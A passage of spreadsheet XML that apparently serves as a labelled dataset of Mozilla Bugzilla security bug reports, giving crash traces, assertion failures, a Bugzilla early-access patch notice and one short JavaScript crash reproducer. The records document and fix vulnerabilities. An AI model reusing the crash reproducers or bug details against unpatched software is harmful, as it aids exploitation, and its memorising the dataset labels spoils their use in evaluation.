      <c r="F114" t="n">
        <v>1</v>
      </c>
      <c r="G114" t="n">
        <v>3</v>
      </c>
      <c r="H114" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I114" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J114" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K114" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L114" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M114" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N114" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O114" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P114" t="inlineStr">
        <is>
          <t>[adv-main22+][adv-main35-]</t>
        </is>
      </c>
      <c r="Q114" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R114" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S114" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T114" t="n">
        <v>1</v>
      </c>
      <c r="U114" t="n">
        <v>0</v>
      </c>
      <c r="V114" t="n">
        <v>12</v>
      </c>
      <c r="W114" t="inlineStr">
        <is>
          <t>Created attachment 725266
testcase (asserts fatally when loaded)
Assertion failure: XPCJSRuntime::Get()-&gt;GetJSContextStack()-&gt;Peek() == cx, at js/xpconnect/wrappers/WrapperFactory.cpp:346
bholley added this assertion in one of the patches in bug 834732,
http://hg.mozilla.org/mozilla-central/rev/a38bbae7a53b</t>
        </is>
      </c>
      <c r="X114" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" t="n">
        <v>990096</v>
      </c>
      <c r="B115" t="inlineStr">
        <is>
          <t>2014-03-31 09:55:54 -0700</t>
        </is>
      </c>
      <c r="C115" t="inlineStr">
        <is>
          <t>AddressSanitizer: global-buffer-overflow due to unhandled OOM [@ JSC::Yarr::digitsCreate()]</t>
        </is>
      </c>
      <c r="D115" t="inlineStr">
        <is>
          <t>2020-02-28 03:02:40 -0800</t>
        </is>
      </c>
      <c r="E115" t="n">
        <v>1</v>
      </c>
      <c r="F115" t="n">
        <v>1</v>
      </c>
      <c r="G115" t="n">
        <v>3</v>
      </c>
      <c r="H115" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I115" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J115" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K115" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L115" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M115" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N115" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O115" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P115" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q115" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R115" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S115" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T115" t="n">
        <v>1</v>
      </c>
      <c r="U115" t="n">
        <v>0</v>
      </c>
      <c r="V115" t="n">
        <v>20</v>
      </c>
      <c r="W115" t="inlineStr">
        <is>
          <t>I'm seeing the following ASan error in OOM fuzzing:
==59119==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000234bb60 at pc 0x11f1c14 bp 0x7fffffff57b0 sp 0x7fffffff57a8
WRITE of size 16 at 0x00000234bb60 thread T0
    #0 0x11f1c13 in VectorBase opt64asan-oom/js/src/../../dist/include/mozilla/Vector.h:588
    #1 0x11f1c13 in Vector opt64asan-oom/js/src/../../dist/include/js/Vector.h:57
    #2 0x11f1c13 in Vector yarr/wtfbridge.h:130
    #3 0x11f1c13 in js_malloc(unsigned long) yarr/YarrPattern.h:99
    #4 0x11f1c13 in _ZL6js_newIN3JSC4Yarr14CharacterClassEEPT_v opt64asan-oom/js/src/../../dist/include/js/Utility.h:325
    #5 0x11f1c13 in JSC::Yarr::digitsCreate() yarr/RegExpJitTables.h:2635
    #6 0x11ffea3 in JSC::Yarr::YarrPattern::digitsCharacterClass() yarr/YarrPattern.h:405
    #7 0x11ffea3 in JSC::Yarr::YarrPatternConstructor::atomBuiltInCharacterClass(JSC::Yarr::BuiltInCharacterClassID, bool) yarr/YarrPattern.cpp:350
    #8 0x120858a in bool JSC::Yarr::Parser&lt;JSC::Yarr::YarrPatternConstructor, char16_t&gt;::parseEscape&lt;false, JSC::Yarr::YarrPatternConstructor&gt;(JSC::Yarr::YarrPatternConstructor&amp;) yarr/YarrParser.h:266
    #9 0x11fe31d in JSC::Yarr::Parser&lt;JSC::Yarr::YarrPatternConstructor, char16_t&gt;::parseAtomEscape() yarr/YarrParser.h:406
    #10 0x11fe31d in JSC::Yarr::Parser&lt;JSC::Yarr::YarrPatternConstructor, char16_t&gt;::parseTokens() yarr/YarrParser.h:586
    #11 0x11f5db6 in Parser yarr/YarrParser.h:674
    #12 0x11f5db6 in JSC::Yarr::ErrorCode JSC::Yarr::parse&lt;JSC::Yarr::YarrPatternConstructor&gt;(JSC::Yarr::YarrPatternConstructor&amp;, JSLinearString const&amp;, unsigned int) yarr/YarrParser.h:855
    #13 0x11f5db6 in JSC::Yarr::YarrPattern::compile(JSLinearString const&amp;) yarr/YarrPattern.cpp:870
According to the OOM backtraces, the OOM is happening in JSC::Yarr::digitsCreate() but the debug information seems to be garbled and didn't point me to any location. However, I identified this as the possible problem:
&gt; 2633 CharacterClass* digitsCreate()
&gt; 2634 {
&gt; 2635     CharacterClass* characterClass = js_new&lt;CharacterClass&gt;();
&gt; 2636     characterClass-&gt;m_ranges.append(CharacterRange(0x30, 0x39));
&gt; 2637     return characterClass;
&gt; 2638 }
Line 2635 is allocating characterClass but not checking the return value of js_new. With the next line this *should* lead to a null crash, but it doesn't. Maybe some weird inlining+optimizing is happening here (this is all in a header file).
When I add a null check right after the js_new and return NULL, then the signature changes and YARR hits MOZ_CRASH instead, so that confirms my theory.
Should we just add the null check right after the js_new?</t>
        </is>
      </c>
      <c r="X115" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" t="n">
        <v>860971</v>
      </c>
      <c r="B116" t="inlineStr">
        <is>
          <t>2013-04-11 15:50:43 -0700</t>
        </is>
      </c>
      <c r="C116" t="inlineStr">
        <is>
          <t>UAF with video and onresize event</t>
        </is>
      </c>
      <c r="D116" t="inlineStr">
        <is>
          <t>2024-05-30 08:02:04 -0700</t>
        </is>
      </c>
      <c r="E116" t="n">
        <v>1</v>
      </c>
      <c r="F116" t="n">
        <v>1</v>
      </c>
      <c r="G116" t="n">
        <v>3</v>
      </c>
      <c r="H116" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I116" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J116" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K116" t="inlineStr">
        <is>
          <t>23 Branch</t>
        </is>
      </c>
      <c r="L116" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M116" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N116" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O116" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P116" t="inlineStr">
        <is>
          <t>[adv-main21+][adv-esr1706+]</t>
        </is>
      </c>
      <c r="Q116" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R116" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S116" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T116" t="n">
        <v>1</v>
      </c>
      <c r="U116" t="n">
        <v>0</v>
      </c>
      <c r="V116" t="n">
        <v>17</v>
      </c>
      <c r="W116" t="inlineStr">
        <is>
          <t>Created attachment 736538
testcase (crashes firefox)
The attached testcase crashes central and stables. skeleton.ogv needs to be in the same directory. The stack on windows looks as follows:</t>
        </is>
      </c>
      <c r="X116" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" t="n">
        <v>621591</v>
      </c>
      <c r="B117" t="inlineStr">
        <is>
          <t>2010-12-27 14:42:25 -0800</t>
        </is>
      </c>
      <c r="C117" t="inlineStr">
        <is>
          <t>Critical Security Issue In Bugzilla Since 2.14: Early-Access Patch</t>
        </is>
      </c>
      <c r="D117" t="inlineStr">
        <is>
          <t>2011-01-24 17:20:07 -0800</t>
        </is>
      </c>
      <c r="E117" t="n">
        <v>1</v>
      </c>
      <c r="F117" t="n">
        <v>1</v>
      </c>
      <c r="G117" t="n">
        <v>4</v>
      </c>
      <c r="H117" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I117" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J117" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K117" t="inlineStr">
        <is>
          <t>2.14</t>
        </is>
      </c>
      <c r="L117" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M117" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N117" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O117" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P117" t="inlineStr"/>
      <c r="Q117" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R117" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S117" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T117" t="n">
        <v>1</v>
      </c>
      <c r="U117" t="n">
        <v>0</v>
      </c>
      <c r="V117" t="n">
        <v>56</v>
      </c>
      <c r="W117" t="inlineStr">
        <is>
          <t>Created attachment 499905
Preliminary Patch
Dear Bugzilla Admins,
A critical security issue has been discovered in Bugzilla, and we are offering you an early-access patch so that you can patch your Bugzilla before we publicly disclose the issue. This issue affects Bugzilla versions 2.14 and higher. The impact of the issue is that a user could gain unauthorized access to any Bugzilla account in a very short amount of time (short enough that the attack is highly effective).
The patch currently attached to this bug is only a preliminary patch--the final patch released with the security advisory will be much more extensive. You will have to revert this patch before upgrading to the security release.
We are aware that, under normal circumstances, what this patch looks to be doing is a bad idea--one should not normally call srand() more than once per process. However, we assure you that for now, it will protect your Bugzilla from this security issue being exploited until a more extensive fix can be provided.
There is one slight exception--if you have Bugzilla installed on Windows, then this patch will not resolve the issue, and you will have to wait for the final security advisory and complete patch.
Please avoid exposing the existence of this issue or this patch until we have a final patch and a public security advisory. (In other words, don't check this patch into any publicly-available version-control repository, don't advertise its contents, etc.)</t>
        </is>
      </c>
      <c r="X117" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" t="n">
        <v>89826</v>
      </c>
      <c r="B118" t="inlineStr">
        <is>
          <t>2001-07-08 02:15:49 -0700</t>
        </is>
      </c>
      <c r="C118" t="inlineStr">
        <is>
          <t>error:  The connection was refused when attempting to contact...</t>
        </is>
      </c>
      <c r="D118" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E118" t="n">
        <v>1</v>
      </c>
      <c r="F118" t="n">
        <v>1</v>
      </c>
      <c r="G118" t="n">
        <v>6</v>
      </c>
      <c r="H118" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I118" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J118" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K118" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L118" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M118" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N118" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O118" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P118" t="inlineStr">
        <is>
          <t>nsbranch</t>
        </is>
      </c>
      <c r="Q118" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R118" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S118" t="inlineStr">
        <is>
          <t>psm2.0</t>
        </is>
      </c>
      <c r="T118" t="n">
        <v>1</v>
      </c>
      <c r="U118" t="n">
        <v>0</v>
      </c>
      <c r="V118" t="n">
        <v>14</v>
      </c>
      <c r="W118" t="inlineStr">
        <is>
          <t>WIN 98 4.10
Mozilla 0.9.2
56K PCI modem
AMD K6-2 450 MHz
256 MB
While inside several credit card sites, for credit cards I possess, after an
arbitrary number of successful page loads, this messege will appear:
The connection was refused when attempting to contact...url.
After the error messege, the same messege will be displayed over and over when
an attempt to load another page is made.  This is regardless of whether you
attempt to load a page in the site where the error occured or at a different
site.  The only thing that will fix the problem is exitting Mozilla and
re-entering.  After that, everything is ok until I enter another credit card
site.  This error can happen on the first page of the site or the tenth, but
usually about the forth.
I hope that this report doesn't offend anyone, I'm not well versed in the
intricacies of this software.</t>
        </is>
      </c>
      <c r="X118" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" t="n">
        <v>675747</v>
      </c>
      <c r="B119" t="inlineStr">
        <is>
          <t>2011-08-01 14:41:07 -0700</t>
        </is>
      </c>
      <c r="C119" t="inlineStr">
        <is>
          <t>ogg crash [@ nsOggReader::ReadHeaders]</t>
        </is>
      </c>
      <c r="D119" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:19 -0700</t>
        </is>
      </c>
      <c r="E119" t="n">
        <v>1</v>
      </c>
      <c r="F119" t="n">
        <v>1</v>
      </c>
      <c r="G119" t="n">
        <v>3</v>
      </c>
      <c r="H119" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I119" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J119" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K119" t="inlineStr">
        <is>
          <t>5 Branch</t>
        </is>
      </c>
      <c r="L119" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M119" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N119" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O119" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P119" t="inlineStr">
        <is>
          <t>[sg:critical?][qa!]</t>
        </is>
      </c>
      <c r="Q119" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R119" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S119" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T119" t="n">
        <v>1</v>
      </c>
      <c r="U119" t="n">
        <v>0</v>
      </c>
      <c r="V119" t="n">
        <v>25</v>
      </c>
      <c r="W119" t="inlineStr">
        <is>
          <t>Created attachment 549931
example.ogg
User Agent: Mozilla/5.0 (X11; U; Linux x86_64; c) AppleWebKit/531.2+ (KHTML, like Gecko) Safari/531.2+ Epiphany/2.30.6
Steps to reproduce:
ran firefox on an .ogg file
it seems like firefox crashes on any ogg file where the beginning of stream flag is set in the second page of a stream, i attached one example
Actual results:
firefox seg faults
Expected results:
firefox should just not play the video like it normally does for corrupted videos rather than seg faulting</t>
        </is>
      </c>
      <c r="X119" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" t="n">
        <v>472920</v>
      </c>
      <c r="B120" t="inlineStr">
        <is>
          <t>2009-01-09 15:50:39 -0800</t>
        </is>
      </c>
      <c r="C120" t="inlineStr">
        <is>
          <t>AVM versioning needs improving</t>
        </is>
      </c>
      <c r="D120" t="inlineStr">
        <is>
          <t>2009-10-21 13:00:32 -0700</t>
        </is>
      </c>
      <c r="E120" t="n">
        <v>1</v>
      </c>
      <c r="F120" t="n">
        <v>1</v>
      </c>
      <c r="G120" t="n">
        <v>6</v>
      </c>
      <c r="H120" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I120" t="inlineStr">
        <is>
          <t>Tamarin Graveyard</t>
        </is>
      </c>
      <c r="J120" t="inlineStr">
        <is>
          <t>Virtual Machine</t>
        </is>
      </c>
      <c r="K120" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L120" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M120" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N120" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O120" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P120" t="inlineStr"/>
      <c r="Q120" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R120" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S120" t="inlineStr">
        <is>
          <t>flash10.1</t>
        </is>
      </c>
      <c r="T120" t="n">
        <v>1</v>
      </c>
      <c r="U120" t="n">
        <v>0</v>
      </c>
      <c r="V120" t="n">
        <v>29</v>
      </c>
      <c r="W120" t="inlineStr">
        <is>
          <t>Created attachment 356261
±Patch
Updates to the AVM Versioning code to allow more flexibility... the old code pruned unacceptable bindings when an ABC was loaded, including all builtin ABC code. For some embedding clients, this is too late.
The gist of the changes is this:
-         The PoolObject maintains a list of version metadata references.
-         After the builtin are loaded and we know the SWFversion of the content (these happen in different orders in AIR andFlashPlayer, sadly), we disable methods from non-current versions.
-         Instead of removing the definitions, they are shunted to a special hiddenVersionNamespace that is accessible to all builtin-code and no user code.
-         A new flag in the Multiname object indicates that the name occurred in builtin code.
-         When a reference to a builtin multiname fails the usual way, the special namespace is tried.
-         TraitsBindings are flushed for any classes that have non-current-version definitions.
-         (ns,name) to traits/scripts mappings are maintained in various tables in the Pool, Domain, DomainEnv.  These are hunted down and the namespaces are adjusted.
As things now stand it should be possible for internal code to call methods and properties that are not in the current version, but this ability has not yet been tested.  You cannot yet use non-current global definitions (classes, typically) because the init scripts still try to define the original name and not the namespace-mangled name. (This caused a lot of grief until it was realized that it does not affect any user code scenarios... non-current-version classes aren’t initialized because they can’t be referenced.  So for now we’re cool as long as builtin code doesn’t try to reference the non-current-version global defs.)
Limitations:
-         It is crude to have a single special namespace rather than a shadow namespace per original source namespace.
-         It is thuggish to resolve explicit single-ns Multinames to the hiddenVersionNamespace.  But so long as it only affects builtin symbol resolution, it should be harmless.
-         There’s something still messed up with setProp/initProp in the global object but this doesn’t have to work since nothing actually ever causes that to happen until or unless we want to have builtin code call non-current-version classes.
Note: this patch doesn't offer any acceptance tests for this feature! A separate bug will be entered to track that.</t>
        </is>
      </c>
      <c r="X120" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" t="n">
        <v>1435908</v>
      </c>
      <c r="B121" t="inlineStr">
        <is>
          <t>2018-02-05 16:24:47 -0800</t>
        </is>
      </c>
      <c r="C121" t="inlineStr">
        <is>
          <t>Web content can open local files and local folders using drag &amp; drop event</t>
        </is>
      </c>
      <c r="D121" t="inlineStr">
        <is>
          <t>2024-05-30 09:42:36 -0700</t>
        </is>
      </c>
      <c r="E121" t="n">
        <v>1</v>
      </c>
      <c r="F121" t="n">
        <v>1</v>
      </c>
      <c r="G121" t="n">
        <v>3</v>
      </c>
      <c r="H121" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I121" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J121" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K121" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L121" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M121" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N121" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O121" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P121" t="inlineStr">
        <is>
          <t>[adv-main60+]</t>
        </is>
      </c>
      <c r="Q121" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R121" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S121" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T121" t="n">
        <v>1</v>
      </c>
      <c r="U121" t="n">
        <v>0</v>
      </c>
      <c r="V121" t="n">
        <v>33</v>
      </c>
      <c r="W121" t="inlineStr">
        <is>
          <t>Created attachment 8948559
testcase-drag-drop-local-file-opening.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:58.0) Gecko/20100101 Firefox/58.0
Build ID: 20180128191252
Steps to reproduce:
-1: Open the Test case in Attachments with Firefox.
-2: Try to Drag and drop the link https://www.bankofamerica.com/ into the Addressbar or Tab bar.
Actual results:
Firefox loads the local folder: File:///etc/ .
(I will upload a demonstration video)
Expected results:
The testcase works on Firefox 58.0.1 and also on Firefox Beta 59.0b6.</t>
        </is>
      </c>
      <c r="X121" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" t="n">
        <v>452913</v>
      </c>
      <c r="B122" t="inlineStr">
        <is>
          <t>2008-08-30 01:07:51 -0700</t>
        </is>
      </c>
      <c r="C122" t="inlineStr">
        <is>
          <t>Crash [@ js_SetPropertyHelper]</t>
        </is>
      </c>
      <c r="D122" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E122" t="n">
        <v>1</v>
      </c>
      <c r="F122" t="n">
        <v>1</v>
      </c>
      <c r="G122" t="n">
        <v>3</v>
      </c>
      <c r="H122" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I122" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J122" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K122" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L122" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M122" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N122" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O122" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P122" t="inlineStr">
        <is>
          <t>[sg:critical?] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q122" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R122" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S122" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T122" t="n">
        <v>1</v>
      </c>
      <c r="U122" t="n">
        <v>0</v>
      </c>
      <c r="V122" t="n">
        <v>51</v>
      </c>
      <c r="W122" t="inlineStr">
        <is>
          <t>Created attachment 336165
crash log
(this.__defineGetter__("x", function (x)'foo'.replace(/o/g, [1].push))); for(let y in [,,,]) for(let y in [,,,]) x = x
$ ./js-moz190-intelmac-debug
js&gt; (this.__defineGetter__("x", function (x)'foo'.replace(/o/g, [1].push))); for(let y in [,,,]) for(let y in [,,,]) x = x
Assertion failure: JS_PROPERTY_CACHE(cx).disabled, at jsinterp.c:97
Trace/BPT trap
Blows opt builds at a possibly exploitable 0x0000000080303ae3 address, then asserts debug with the above assertion. Mac 10.5.4 Leopard.
Nominating security sensitive because it crashes at a scary address.</t>
        </is>
      </c>
      <c r="X122" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" t="n">
        <v>942152</v>
      </c>
      <c r="B123" t="inlineStr">
        <is>
          <t>2013-11-22 06:55:50 -0800</t>
        </is>
      </c>
      <c r="C123" t="inlineStr">
        <is>
          <t>Assertion failure: ss-&gt;ssl3.hs.hashType == handshake_hash_unknown</t>
        </is>
      </c>
      <c r="D123" t="inlineStr">
        <is>
          <t>2015-02-25 20:46:50 -0800</t>
        </is>
      </c>
      <c r="E123" t="n">
        <v>1</v>
      </c>
      <c r="F123" t="n">
        <v>1</v>
      </c>
      <c r="G123" t="n">
        <v>3</v>
      </c>
      <c r="H123" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I123" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J123" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K123" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L123" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M123" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N123" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O123" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P123" t="inlineStr">
        <is>
          <t>[adv-main27+][adv-esr24.4+][qa-]</t>
        </is>
      </c>
      <c r="Q123" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R123" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S123" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T123" t="n">
        <v>1</v>
      </c>
      <c r="U123" t="n">
        <v>0</v>
      </c>
      <c r="V123" t="n">
        <v>49</v>
      </c>
      <c r="W123" t="inlineStr">
        <is>
          <t>Loading https://avukat.uyap.gov.tr/portal_baslangic.uyap with a debug build tested on win7 crashes on load with Assertion failure: ss-&gt;ssl3.hs.hashType == handshake_hash_unknown 
will try to get a testcase etc for this - also according to bughunter it also crashes nightly and aurora builds</t>
        </is>
      </c>
      <c r="X123" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" t="n">
        <v>797977</v>
      </c>
      <c r="B124" t="inlineStr">
        <is>
          <t>2012-10-04 11:53:52 -0700</t>
        </is>
      </c>
      <c r="C124" t="inlineStr">
        <is>
          <t>IonMonkey: Enable StackIter::fp() assertion.</t>
        </is>
      </c>
      <c r="D124" t="inlineStr">
        <is>
          <t>2013-05-02 14:16:46 -0700</t>
        </is>
      </c>
      <c r="E124" t="n">
        <v>1</v>
      </c>
      <c r="F124" t="n">
        <v>1</v>
      </c>
      <c r="G124" t="n">
        <v>3</v>
      </c>
      <c r="H124" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I124" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J124" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K124" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L124" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M124" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N124" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O124" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P124" t="inlineStr">
        <is>
          <t>[ion:p1][adv-main19+]</t>
        </is>
      </c>
      <c r="Q124" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R124" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S124" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T124" t="n">
        <v>1</v>
      </c>
      <c r="U124" t="n">
        <v>0</v>
      </c>
      <c r="V124" t="n">
        <v>16</v>
      </c>
      <c r="W124" t="inlineStr">
        <is>
          <t>Currently there is a remaining comment on top of StackIter::fp() asking for adding !isIon() to the assertion, one use case is comming from fun_getProperty and another is coming from pushExecuteFrame (under DebuggerFrame_eval).
I am haven't investigated all the risk yet, so I flagging this as s-s in the mean time and flag it for ff18.</t>
        </is>
      </c>
      <c r="X124" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" t="n">
        <v>916726</v>
      </c>
      <c r="B125" t="inlineStr">
        <is>
          <t>2013-09-16 03:47:11 -0700</t>
        </is>
      </c>
      <c r="C125" t="inlineStr">
        <is>
          <t>Download "open file" dialog delay is too quick, doesn't prevent clickjacking</t>
        </is>
      </c>
      <c r="D125" t="inlineStr">
        <is>
          <t>2024-06-02 18:29:59 -0700</t>
        </is>
      </c>
      <c r="E125" t="n">
        <v>1</v>
      </c>
      <c r="F125" t="n">
        <v>1</v>
      </c>
      <c r="G125" t="n">
        <v>3</v>
      </c>
      <c r="H125" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I125" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
